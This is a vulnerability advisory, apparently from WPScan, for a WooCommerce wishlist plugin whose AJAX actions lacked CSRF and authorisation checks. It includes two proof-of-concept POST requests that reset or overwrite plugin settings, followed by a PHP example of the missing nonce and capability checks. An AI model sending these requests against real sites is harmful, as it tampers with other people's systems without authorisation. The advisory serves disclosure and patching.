WordPress Plugin Vulnerabilities

ThemeHigh WooCommerce Wishlist and Comparison < 1.0.5 - Unauthorised AJAX call

Description

Some AJAX actions lacked proper CSRF and authorisation checks, so they could be called by unauthenticated or low-privilege users, or triggered via CSRF. This could allow attackers to, for example, reset or change the settings of the plugin.

Proof of Concept

Reset arbitrary option in the plugin (v < 1.0.5)

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Connection: close

action=reset_to_default&reset=general_settings


Save General Settings (v < 1.0.3)

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
Connection: close

action=save_general_settings&wishlist_page=&ajax_loading=false&require_login=false&wishlnk_myaccont=false&remove_pdct=true&chckut_redrct=false&success_notice=false


Other actions were possible
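
For reference when auditing or patching a handler of this kind, the sketch below shows the two checks the description says were missing (a nonce check against CSRF and a capability check for authorisation) applied to the `reset_to_default` action. It is an added example, not the plugin's code or its actual fix; the function name, nonce action, `security` field, script handle, option prefix and the choice of `manage_options` are assumptions.

```php
<?php
// Added example, not the plugin's source. Hypothetical names: demo_* functions,
// the 'demo_settings' nonce action, the 'security' field, the 'demo_' option
// prefix and the 'demo-admin' script handle (assumed to be enqueued elsewhere).

// Register only the authenticated hook. A matching wp_ajax_nopriv_* hook would
// make the action reachable by logged-out visitors.
add_action( 'wp_ajax_reset_to_default', 'demo_reset_to_default' );

function demo_reset_to_default() {
    // 1. CSRF: verify a nonce bound to this action and the current session.
    //    Passing false as the third argument makes the function return false
    //    instead of dying, so a JSON error can be sent.
    if ( ! check_ajax_referer( 'demo_settings', 'security', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
    }

    // 2. Authorisation: wp_ajax_* fires for every logged-in user, including
    //    subscribers and customers, so the capability must be checked here.
    //    'manage_options' is an assumed choice for a settings page.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // 3. Allow-list the section so the caller cannot pick an arbitrary option.
    $allowed = array( 'general_settings' );
    $section = isset( $_POST['reset'] )
        ? sanitize_key( wp_unslash( $_POST['reset'] ) )
        : '';
    if ( ! in_array( $section, $allowed, true ) ) {
        wp_send_json_error( array( 'message' => 'Unknown section' ), 400 );
    }

    delete_option( 'demo_' . $section );
    wp_send_json_success(); // wp_send_json_* terminates the request.
}

// Hand the nonce to the settings page script so legitimate requests can send it.
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script( 'demo-admin', 'demoSettings', array(
        'nonce' => wp_create_nonce( 'demo_settings' ),
    ) );
} );
```

A request shaped like the first proof of concept carries no nonce field, so a logged-in caller is rejected at step 1, and a logged-out caller never reaches the handler.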

Affects Plugins

Fixed in 1.0.5

Classification

Type
ACCESS CONTROLS
CWE
CVSS

Miscellaneous

Original Researcher
WPScanTeam
Verified
Yes

Timeline

Publicly Published
2021-05-08
Added
2021-05-08
Last Updated
2021-05-08
